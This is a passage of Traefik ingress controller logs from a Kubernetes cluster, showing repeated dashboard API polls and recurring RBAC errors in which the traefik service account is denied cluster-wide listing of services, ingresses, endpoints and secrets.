the cluster scope +10.2.0.129 - - [30/Mar/2024:07:30:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 385 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 386 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:33 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 387 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:33 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 388 "api@internal" "-" 0ms +W0330 07:30:36.350475 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:30:36.350506 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:30:38 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 389 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:38 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 390 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:43 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 391 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:43 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 392 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:48 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 393 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:48 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 394 "api@internal" "-" 0ms +W0330 07:30:49.936388 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:30:49.936550 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:30:54 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 395 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:54 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 396 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 397 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:30:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 398 "api@internal" "-" 0ms +W0330 07:31:00.202642 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:31:00.202670 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:31:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 399 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 400 "api@internal" "-" 0ms +W0330 07:31:08.880310 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:31:08.880352 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:31:08 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 401 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:08 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 402 "api@internal" "-" 0ms +W0330 07:31:13.338281 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:31:13.338449 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:31:13 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 403 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:13 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 404 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:19 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 405 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:19 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 406 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:24 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 407 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 408 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:29 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 409 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:29 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 410 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 411 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 412 "api@internal" "-" 0ms +W0330 07:31:36.595882 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:31:36.595922 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:31:39 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 413 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:39 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 414 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:44 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 415 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:44 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 416 "api@internal" "-" 0ms +W0330 07:31:47.902163 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:31:47.902206 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:31:49 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 417 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:49 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 418 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:54 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 419 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:54 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 420 "api@internal" "-" 0ms +W0330 07:31:56.445670 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:31:56.445757 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +W0330 07:31:57.719011 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:31:57.719135 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:31:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 421 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:31:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 422 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 423 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 424 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 425 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 426 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:14 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 427 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:14 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 428 "api@internal" "-" 0ms +W0330 07:32:17.559125 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:32:17.559164 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:32:19 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 429 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:19 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 430 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 431 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:24 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 432 "api@internal" "-" 0ms +W0330 07:32:28.298183 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:32:28.298235 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:32:29 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 433 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:29 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 434 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 435 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 436 "api@internal" "-" 0ms +W0330 07:32:35.178972 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:32:35.179124 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:32:39 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 437 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:39 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 438 "api@internal" "-" 0ms +W0330 07:32:42.723349 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:32:42.723389 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:32:44 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 439 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:44 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 440 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:49 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 441 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:49 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 442 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:54 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 443 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:54 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 444 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 445 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:32:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 446 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 447 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 448 "api@internal" "-" 0ms +W0330 07:33:04.930109 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:33:04.930138 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:33:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 450 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 449 "api@internal" "-" 0ms +W0330 07:33:09.850870 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:33:09.850962 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:33:14 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 451 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:14 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 452 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:19 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 453 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:19 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 454 "api@internal" "-" 0ms +W0330 07:33:21.624790 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:33:21.624821 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:33:23.383679 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:33:23.383731 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:33:24 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 455 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 456 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:29 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 457 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:29 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 458 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 459 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 460 "api@internal" "-" 0ms +W0330 07:33:36.130987 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:33:36.131105 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:33:39 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 461 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:39 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 462 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:44 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 463 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:44 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 464 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:49 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 465 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:49 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 466 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:54 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 467 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:54 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 468 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:59 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 469 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:33:59 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 470 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 471 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 472 "api@internal" "-" 0ms +W0330 07:34:07.451447 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +E0330 07:34:07.451479 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Service: failed to list *v1.Service: services is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "services" in API group "" at the cluster scope +W0330 07:34:08.041136 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +E0330 07:34:08.041166 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Secret: failed to list *v1.Secret: secrets is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "secrets" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:34:09 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 473 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:09 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 474 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:14 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 475 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:14 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 476 "api@internal" "-" 0ms +W0330 07:34:18.297847 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +E0330 07:34:18.298005 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Ingress: failed to list *v1.Ingress: ingresses.networking.k8s.io is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "ingresses" in API group "networking.k8s.io" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:34:19 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 477 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:19 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 478 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:24 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 479 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 480 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:29 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 481 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:29 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 482 "api@internal" "-" 0ms +time="2024-03-30T07:34:31Z" level=debug msg="Serving default certificate for request: \"whoami.172.233.168.9.nip.io\"" +time="2024-03-30T07:34:31Z" level=debug msg="http: TLS handshake error from 10.0.0.4:55994: local error: tls: bad record MAC" +W0330 07:34:31.825209 1 reflector.go:424] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +E0330 07:34:31.825305 1 reflector.go:140] k8s.io/client-go@v0.26.3/tools/cache/reflector.go:169: Failed to watch *v1.Endpoints: failed to list *v1.Endpoints: endpoints is forbidden: User "system:serviceaccount:akashop:traefik-account" cannot list resource "endpoints" in API group "" at the cluster scope +10.2.0.129 - - [30/Mar/2024:07:34:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 483 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 484 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:39 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 485 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:39 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 486 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:44 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 487 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:44 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 488 "api@internal" "-" 0ms +time="2024-03-30T07:34:48Z" level=debug msg="Serving default certificate for request: \"whoami.172.233.168.9.nip.io\"" +10.2.1.1 - - [30/Mar/2024:07:34:48 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 489 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:49 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 490 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:34:49 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 462 "-" "-" 491 "api@internal" "-" 0ms +10.2.0.129 